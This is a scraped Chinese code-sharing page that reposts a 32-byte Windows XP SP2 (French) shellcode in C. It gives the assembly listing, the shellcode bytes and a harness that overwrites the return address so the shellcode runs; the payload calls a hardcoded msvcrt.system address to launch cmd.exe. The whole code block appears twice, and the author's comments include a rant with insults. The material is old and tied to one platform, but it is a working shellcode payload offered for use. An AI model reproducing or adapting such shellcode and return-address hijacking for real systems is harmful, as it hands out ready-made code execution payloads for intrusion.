代码
比这篇新的文章:
拉丁方阵
比这篇旧的文章: 支持CNKI的Zotero的translator
作者: wwei, 点击565次, 评论(0), 收藏者(0), , 打分:
所有评论,共0条:( 我也来说两句)
比这篇旧的文章: 支持CNKI的Zotero的translator
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
语言: C, 标签: shellcode 2009/02/21发布 1年前更新作者: wwei, 点击565次, 评论(0), 收藏者(0), , 打分:
01 ///////////////////////////////////////////////////////////////////////////////
02 //-----------------------------------------------------------------------------
03 // windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
04 //
05 // Author : Mountassif Moad
06 // Big Thnx : Houssamix & SimO-s0fT
07 // Changed by : Stack wangweinoo1
08 //
09 // Description:
10 // It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
11 //
12 //My first original shellcode Here http://www.milw0rm.com/shellcode/7971
13 //because i receive every day full message who insult me (you'r lamer - fucker ->
14 //you dont understand anything abouts sec ) infinity of insult
15 //and the last time i receive an message have => i make full error in my first shelcode & in the end he
16 //insult my mother & me (shit)
17 //so i tell all people when want insult anyone remembers we are just human not angel
18 //euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
19 //
20 //wangweinoo1:changed a little,Compiled in dev-c++
21 //
22 //Assembly Code : this time is not a secret (:@)
23 //00402000 8BEC MOV EBP,ESP
24 //00402002 33FF XOR EDI,EDI
25 //00402004 57 PUSH EDI
26 //00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
27 //00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
28 //0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
29 //00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
30 //00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
31 //00402018 50 PUSH EAX
32 //00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
33 //0040201E FFD0 CALL EAX
34 //-----------------------------------------------------------------------------
35 ///////////////////////////////////////////////////////////////////////////////
36
37 #include <stdio.h>
38 #include <string.h>
39 unsigned char shellcode[] =
40 "\x8B\xEC\x33\xFF\x57"
41 "\xC6\x45\xFC\x63\xC6\x45"
42 "\xFD\x6D\xC6\x45\xFE\x64"
43 "\xC6\x45\xF8\x01\x8D"
44 "\x45\xFC\x50\xB8\xC7\x93"
45 "\xBF\x77\xFF\xD0";
46 int main (void)
47 {
48 int *ret;
49 ret=(int *)&ret+2;
50 printf("Shellcode Length is : %d\n",strlen("shellcode"));
51 (*ret)=(int)shellcode;
52 return 0;
53 }
02 //-----------------------------------------------------------------------------
03 // windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
04 //
05 // Author : Mountassif Moad
06 // Big Thnx : Houssamix & SimO-s0fT
07 // Changed by : Stack wangweinoo1
08 //
09 // Description:
10 // It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR
11 //
12 //My first original shellcode Here http://www.milw0rm.com/shellcode/7971
13 //because i receive every day full message who insult me (you'r lamer - fucker ->
14 //you dont understand anything abouts sec ) infinity of insult
15 //and the last time i receive an message have => i make full error in my first shelcode & in the end he
16 //insult my mother & me (shit)
17 //so i tell all people when want insult anyone remembers we are just human not angel
18 //euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
19 //
20 //wangweinoo1:changed a little,Compiled in dev-c++
21 //
22 //Assembly Code : this time is not a secret (:@)
23 //00402000 8BEC MOV EBP,ESP
24 //00402002 33FF XOR EDI,EDI
25 //00402004 57 PUSH EDI
26 //00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
27 //00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
28 //0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
29 //00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
30 //00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
31 //00402018 50 PUSH EAX
32 //00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
33 //0040201E FFD0 CALL EAX
34 //-----------------------------------------------------------------------------
35 ///////////////////////////////////////////////////////////////////////////////
36
37 #include <stdio.h>
38 #include <string.h>
39 unsigned char shellcode[] =
40 "\x8B\xEC\x33\xFF\x57"
41 "\xC6\x45\xFC\x63\xC6\x45"
42 "\xFD\x6D\xC6\x45\xFE\x64"
43 "\xC6\x45\xF8\x01\x8D"
44 "\x45\xFC\x50\xB8\xC7\x93"
45 "\xBF\x77\xFF\xD0";
46 int main (void)
47 {
48 int *ret;
49 ret=(int *)&ret+2;
50 printf("Shellcode Length is : %d\n",strlen("shellcode"));
51 (*ret)=(int)shellcode;
52 return 0;
53 }
所有评论,共0条:( 我也来说两句)